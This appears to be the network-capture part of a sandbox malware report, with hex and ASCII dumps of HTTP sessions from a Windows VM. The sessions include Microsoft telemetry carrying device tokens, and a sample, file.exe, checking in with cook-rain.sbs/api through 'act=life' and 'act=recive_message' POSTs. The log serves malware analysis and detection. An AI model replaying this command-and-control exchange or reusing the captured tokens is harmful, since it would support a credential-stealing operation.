                                                                                                                                                                                                            2024-11-21 14:17:06 UTC3363INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69
                                                                                                                                                                                                            Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            2192.168.2.64971120.223.35.26443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:05 UTC2594OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141651Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=6e3d5c7f28304154b7e32185d88f14c6&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595198&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595198&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED]
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6
                                                                                                                                                                                                            X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAdddCDU6xcjr4JQG4Q5CqQxYxRM7l7bC2MlFt9QO4Uu+ii8g720LG20edSSoTxnVPQfVrlOu/1noHbdP1+SiDi5DXdT/uC4gyHD0VoOT8ej2C+khCyhpug75SlIEjFej8fFvFo7FRZmWh8e545MnqHUljhAUzmKsKLRg/3UcXh4JkTf7zSwTP9Crj3xvwV1r5M6EZ2sADzFErRcH2T24HTT5pOeqDoqUYjhsuCPe3yRmQrN0Jxh9YUgKXYnq69TAggEbmdB1hu9ZbRMSeeNln3HQwGNpDyLAvfI/4qb8hmqcUU1ZMGFO6SmtXaqVqSt9dfRZCFSE0gLywHw9AU/GzhwQZgAAEFEx4GTAhho3OjsZqAmeDBGwAZrzfXIbMVmxY0gq43gsR+XFsMJV2em1OpWyTkKCsmCfRc0fQ2P3M5FixVfVvC6+Elf6vKcOvvh2O1ligabHXzOlv0+PIDskSvaKEEsNK4lFZgVuuCQvOcOeBFJFsoScYFvtgGuQFqbDJPhPXRk2Kns3oBWGkhojE39/8dhbMYxASaLuL6WGyWx5zYb5ofoKVgqa3ptlwEadefCXtg4fWmkirEAGZQaUFDXAU2t6EB61kHyIJcwVHqXJ2un3vVklw3loObixAHiUyJpucs9UOzZeo+QuKqRj9UBkZ0l+xHKRCSrHpOxSz2KC3NaERTi0TNkOyV2KPCwH/DiizCJkQat+YtCrfaUrnP8JpUx+sHRnirFRpxJie0ZUQ9EweMiOw9v3uqu/l+kr36/nMxN9zDoPFklZLXJwHnstSY3kHNbfUV00laThjc3ROnFULKiu9uplrlhqZuw1+UXjMoRKswiIfGoG2P/2TfNyGX+p2NQqqtWJJpacJswbPDatcvqWBUAK2nvgrOuvvuunq3A/uRzjbXrFE5SWyODjPGzEL9hUSiKn1V5c54BVjvH66nb0DNcB&p=
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            MS-CV: cfBi9oBThkS/fW90.0
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0
                                                                                                                                                                                                            Host: arc.msn.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:06 UTC814INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Length: 1440
                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                            ARC-RSP-DBG: []
                                                                                                                                                                                                            X-ARC-SIG: clg7uqFsu5mfTu5LBV9gIqr0r5kMKc6eUjOiunogHWL/mMhbEcPR/GtLzCJts5tsbBkap4d0koS4RTUsxE//Wa6SqSjuT9GQ+shDrCBvzRzhDSBKeyIx7pd1qld3mGjvzKOQ8b9W+/uCLMb8r3cwI2+LqZxMYo7Xbhgo65ZCpjsPifOT+RjO3oYfj+BVek8JkegdQEzhVlf9Lz/IysNv8ChGZoX56wgGQR+YAuQkpy7g0UvUXd+gmEmYR80oW6acYJPx3OdPTQiOKHR0CLFfVXFh6Tbkx45tigTYM58dugBFBZZyRaE9IHvWjVfKr7AbeZDbwiuqmd0t45keqZUW3Q==
                                                                                                                                                                                                            Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                            X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:05 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-11-21 14:17:06 UTC1440INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 45 6d 70 74 79 43 72 65 61 74 69 76 65 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 6b 69 6e 67 5c
                                                                                                                                                                                                            Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"EmptyCreative\",\"propertyManifest\":{},\"properties\":{},\"tracking\


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.649714188.114.97.34434784C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:10 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-21 14:17:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                            2024-11-21 14:17:11 UTC978INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:10 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=lnf0e01g3m97m32je0qgimqh4q; expires=Mon, 17-Mar-2025 08:03:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wu9AGMOmkUSnDmtKmI5eAv1Mc2hr3GfeX4NPBconvRgIzQ8PdEQbI1IqE%2FLgogzKnw5MXasvvu2uoAOOHwjI66CVjcOQWpI41zevJw8%2F4ArVj89yQXOpOo0mniWdChyV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e614d4209647d18-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2011&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=904&delivery_rate=1432777&cwnd=216&unsent_bytes=0&cid=c8e5cffdaa356e70&ts=731&x=0"
                                                                                                                                                                                                            2024-11-21 14:17:11 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                            2024-11-21 14:17:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            4192.168.2.64971340.113.110.67443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:10 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 4c 76 34 61 51 55 75 53 30 4f 35 7a 57 53 70 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 65 30 63 33 33 36 30 30 65 66 63 65 33 30 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: sLv4aQUuS0O5zWSp.1Context: 9e0c33600efce300
                                                                                                                                                                                                            2024-11-21 14:17:10 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                            2024-11-21 14:17:10 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 73 4c 76 34 61 51 55 75 53 30 4f 35 7a 57 53 70 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 65 30 63 33 33 36 30 30 65 66 63 65 33 30 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 50 30 31 76 6b 39 4e 36 51 2f 41 41 51 47 39 56 53 4a 4c 42 31 38 70 76 2f 36 4c 4e 45 32 46 39 46 78 75 31 71 41 30 4f 36 38 6b 2b 35 53 4a 76 63 42 4c 6a 65 61 66 56 69 75 2b 4b 51 44 77 6d 71 68 4e 6b 74 56 50 45 63 65 61 39 73 46 39 69 4f 6f 7a 6a 6a 77 34 4a 52 4a 43 44 39 57 70 59 50 59 74 76 79 37 4e 7a 4e 4a 73 43
                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: sLv4aQUuS0O5zWSp.2Context: 9e0c33600efce300<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUP01vk9N6Q/AAQG9VSJLB18pv/6LNE2F9Fxu1qA0O68k+5SJvcBLjeafViu+KQDwmqhNktVPEcea9sF9iOozjjw4JRJCD9WpYPYtvy7NzNJsC
                                                                                                                                                                                                            2024-11-21 14:17:10 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 73 4c 76 34 61 51 55 75 53 30 4f 35 7a 57 53 70 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 65 30 63 33 33 36 30 30 65 66 63 65 33 30 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: sLv4aQUuS0O5zWSp.3Context: 9e0c33600efce300<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                            2024-11-21 14:17:11 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                            2024-11-21 14:17:11 UTC58INData Raw: 4d 53 2d 43 56 3a 20 7a 55 61 68 52 52 62 75 52 6b 2b 6a 6f 6e 39 58 68 52 59 74 2f 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                            Data Ascii: MS-CV: zUahRRbuRk+jon9XhRYt/w.0Payload parsing failed.


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.649715188.114.97.34434784C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:12 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 53
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-21 14:17:12 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                            2024-11-21 14:17:13 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:13 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=qb792gserbufvf9602gp6tukf1; expires=Mon, 17-Mar-2025 08:03:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D954ZmgFZQ2SE8kI%2Be9Tzh6Q6tPh6gXuMas2zMyB%2Bia1YgTCRkqmn2q%2BlA8nJfQhxdZUgpapE1AMrDPVsV9ix8l46pQzDsYLL2KM3JKuRPMP4f7A0k%2Ftw0x9MMoCcub8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e614d513f7a1a07-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2105&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=950&delivery_rate=1391138&cwnd=244&unsent_bytes=0&cid=47731d576f8fe69f&ts=709&x=0"
                                                                                                                                                                                                            2024-11-21 14:17:13 UTC387INData Raw: 33 66 61 38 0d 0a 38 4c 53 70 77 56 51 57 73 67 64 39 74 49 33 62 37 58 48 6a 35 30 56 56 31 4c 30 65 56 75 6c 48 4b 72 4a 49 47 32 52 36 68 74 65 4c 6c 74 2f 6a 62 69 4b 65 4a 51 37 52 72 2b 47 5a 41 35 61 43 61 58 65 31 32 54 78 73 6a 79 5a 47 77 53 30 33 52 67 7a 72 39 63 72 53 79 4b 30 6e 63 35 34 6c 47 4d 79 76 34 62 59 4b 77 59 49 72 64 2b 36 66 65 7a 79 4c 4a 6b 62 51 4b 58 41 4c 43 75 71 30 6d 4e 6a 4f 71 54 46 31 31 6d 59 52 32 65 69 2b 69 42 43 4a 69 53 77 34 76 4e 41 38 65 73 73 69 55 4a 42 79 4f 53 6b 66 38 72 61 39 31 64 71 71 64 6d 75 65 66 46 2f 52 34 2f 6e 58 55 34 4b 43 4a 7a 6d 79 32 58 55 2b 67 53 39 4f 30 53 78 78 46 42 50 67 76 35 6a 57 7a 61 67 37 66 4d 4a 72 47 39 37 6a 75 49 49 51 77 63 74 6e 4d 4b 36 66 4a 48 54 59 46 30 76 42 4f
                                                                                                                                                                                                            Data Ascii: 3fa88LSpwVQWsgd9tI3b7XHj50VV1L0eVulHKrJIG2R6hteLlt/jbiKeJQ7Rr+GZA5aCaXe12TxsjyZGwS03Rgzr9crSyK0nc54lGMyv4bYKwYIrd+6fezyLJkbQKXALCuq0mNjOqTF11mYR2ei+iBCJiSw4vNA8essiUJByOSkf8ra91dqqdmuefF/R4/nXU4KCJzmy2XU+gS9O0SxxFBPgv5jWzag7fMJrG97juIIQwctnMK6fJHTYF0vBO
                                                                                                                                                                                                            2024-11-21 14:17:13 UTC1369INData Raw: 65 6d 7a 6b 74 61 4c 37 58 5a 7a 79 43 56 48 6c 73 79 38 6e 78 53 4e 6b 32 55 4e 39 73 41 79 4c 63 73 69 52 4a 42 79 4f 51 34 64 35 37 61 5a 32 63 69 72 50 57 62 51 64 78 6e 62 36 71 75 4a 46 6f 2b 50 4a 43 57 38 30 58 6f 33 67 69 35 42 31 53 31 39 52 6c 61 6b 73 6f 71 57 6b 2b 4d 58 65 64 74 70 46 63 48 76 2b 5a 42 64 6d 4d 55 67 4f 2f 61 48 50 44 43 4b 49 55 6e 55 4a 48 63 43 46 4f 4b 37 6e 39 6e 4e 71 54 5a 7a 32 6d 30 58 31 2b 4b 79 67 42 4f 45 69 43 4d 78 75 74 35 35 64 4d 56 6c 54 38 68 71 49 55 59 32 34 37 61 41 6c 50 36 67 4f 48 72 58 63 31 2f 4a 6f 61 44 50 46 49 33 46 66 33 65 34 32 6e 4d 6d 69 6a 64 4e 33 6a 68 31 41 78 37 70 74 70 7a 57 7a 71 51 37 65 74 5a 69 48 4e 37 72 75 49 45 66 69 34 59 6a 4e 50 61 52 50 44 4f 54 5a 52 43 51 47 33 6f 43
                                                                                                                                                                                                            Data Ascii: emzktaL7XZzyCVHlsy8nxSNk2UN9sAyLcsiRJByOQ4d57aZ2cirPWbQdxnb6quJFo+PJCW80Xo3gi5B1S19RlaksoqWk+MXedtpFcHv+ZBdmMUgO/aHPDCKIUnUJHcCFOK7n9nNqTZz2m0X1+KygBOEiCMxut55dMVlT8hqIUY247aAlP6gOHrXc1/JoaDPFI3Ff3e42nMmijdN3jh1Ax7ptpzWzqQ7etZiHN7ruIEfi4YjNPaRPDOTZRCQG3oC
                                                                                                                                                                                                            2024-11-21 14:17:13 UTC1369INData Raw: 58 63 78 61 51 79 65 4e 6c 6f 47 64 62 6f 76 59 6f 42 68 49 77 72 4f 2f 61 52 50 44 4f 54 5a 52 43 51 42 58 34 51 47 38 75 32 67 39 2b 4c 76 48 68 74 6b 47 49 54 6c 72 66 35 69 42 61 4a 6a 69 45 2f 74 73 31 35 4f 6f 41 6b 51 74 59 72 64 41 6f 65 35 4c 53 53 30 4d 65 6a 4d 58 50 43 64 78 72 51 2f 62 50 50 58 63 47 43 50 33 66 75 6e 30 6f 6b 6e 44 52 65 6b 68 39 36 43 42 62 6a 6f 39 4c 4a 68 62 70 32 63 39 77 6c 52 35 62 6b 75 59 4d 55 69 59 4d 6a 50 37 6e 51 64 53 61 4b 4b 55 62 43 4c 58 6b 50 46 75 75 35 6d 39 76 4d 72 6a 31 2b 33 57 45 59 31 36 2f 33 7a 78 53 5a 78 58 39 33 67 4d 39 78 4f 4b 55 75 52 4e 6c 71 5a 6b 67 42 70 4c 4b 65 6c 70 50 6a 4d 6e 6a 59 62 78 44 66 35 62 4f 41 47 6f 47 4e 4c 6a 36 31 33 33 41 79 69 69 6c 45 33 53 39 36 41 78 58 68 74
                                                                                                                                                                                                            Data Ascii: XcxaQyeNloGdbovYoBhIwrO/aRPDOTZRCQBX4QG8u2g9+LvHhtkGITlrf5iBaJjiE/ts15OoAkQtYrdAoe5LSS0MejMXPCdxrQ/bPPXcGCP3fun0oknDRekh96CBbjo9LJhbp2c9wlR5bkuYMUiYMjP7nQdSaKKUbCLXkPFuu5m9vMrj1+3WEY16/3zxSZxX93gM9xOKUuRNlqZkgBpLKelpPjMnjYbxDf5bOAGoGNLj6133AyiilE3S96AxXht
                                                                                                                                                                                                            2024-11-21 14:17:13 UTC1369INData Raw: 6a 4d 58 69 51 50 56 2f 61 37 4c 57 48 48 49 65 4d 4b 7a 32 2f 31 48 41 2f 6a 79 6c 42 31 53 78 34 41 78 33 6c 73 5a 37 63 7a 61 41 31 65 39 39 71 46 35 61 68 2b 59 67 4c 77 64 31 6e 45 71 48 55 63 6a 4c 4c 4f 67 62 4a 61 6e 34 4b 57 4c 7a 31 6e 74 2f 4e 70 54 4e 34 30 57 4d 58 30 2b 65 39 6a 68 57 48 68 69 67 7a 73 39 35 7a 4d 49 63 72 51 74 45 72 64 51 30 58 37 37 44 53 6d 49 75 6b 4c 6a 53 49 4a 53 37 56 2b 61 36 66 48 38 47 61 61 53 37 32 32 48 42 30 30 32 56 4a 77 69 42 7a 43 42 33 72 73 4a 48 5a 7a 4b 34 77 65 4e 70 73 46 39 44 67 73 4a 30 51 6a 59 73 67 4f 62 72 52 63 54 36 49 4b 41 69 65 61 6e 34 65 57 4c 7a 31 76 74 48 47 6a 54 31 34 31 79 55 41 6d 50 62 35 69 42 2f 42 33 57 63 37 76 4e 4e 31 4e 49 49 67 51 4e 73 6a 66 41 63 54 34 62 61 55 32 38
                                                                                                                                                                                                            Data Ascii: jMXiQPV/a7LWHHIeMKz2/1HA/jylB1Sx4Ax3lsZ7czaA1e99qF5ah+YgLwd1nEqHUcjLLOgbJan4KWLz1nt/NpTN40WMX0+e9jhWHhigzs95zMIcrQtErdQ0X77DSmIukLjSIJS7V+a6fH8GaaS722HB002VJwiBzCB3rsJHZzK4weNpsF9DgsJ0QjYsgObrRcT6IKAiean4eWLz1vtHGjT141yUAmPb5iB/B3Wc7vNN1NIIgQNsjfAcT4baU28
                                                                                                                                                                                                            2024-11-21 14:17:13 UTC1369INData Raw: 33 43 56 48 6c 75 6d 32 68 68 43 4f 68 43 34 37 75 39 70 31 4d 59 6f 6a 54 4e 6f 67 65 51 41 65 35 62 43 59 31 63 71 70 50 33 50 59 59 68 7a 45 72 2f 66 50 46 4a 6e 46 66 33 65 66 32 47 34 36 6d 32 56 58 6e 6a 4d 35 41 52 53 6b 37 64 4c 53 77 61 77 79 63 39 78 6a 47 74 44 69 75 49 41 53 67 59 6f 6a 50 4c 2f 5a 66 54 6d 4f 4b 45 7a 43 49 48 49 4a 46 4f 32 35 6e 35 61 46 34 7a 46 73 6b 44 31 66 35 2b 4b 33 67 52 53 58 78 54 68 35 72 35 39 37 4f 4d 74 39 43 4e 45 6d 64 67 55 58 35 37 61 54 33 4e 6d 78 4f 6e 33 59 59 42 50 64 34 62 2b 64 46 59 36 4d 4a 44 53 2f 32 48 51 34 67 53 5a 50 6b 47 51 35 41 51 43 6b 37 64 4c 31 33 4c 4d 37 4e 4d 38 72 42 70 62 6f 74 63 39 4c 77 59 30 71 50 37 7a 62 65 7a 6d 4d 49 30 48 43 49 33 77 49 47 4f 43 2b 6e 64 44 50 6f 44 5a
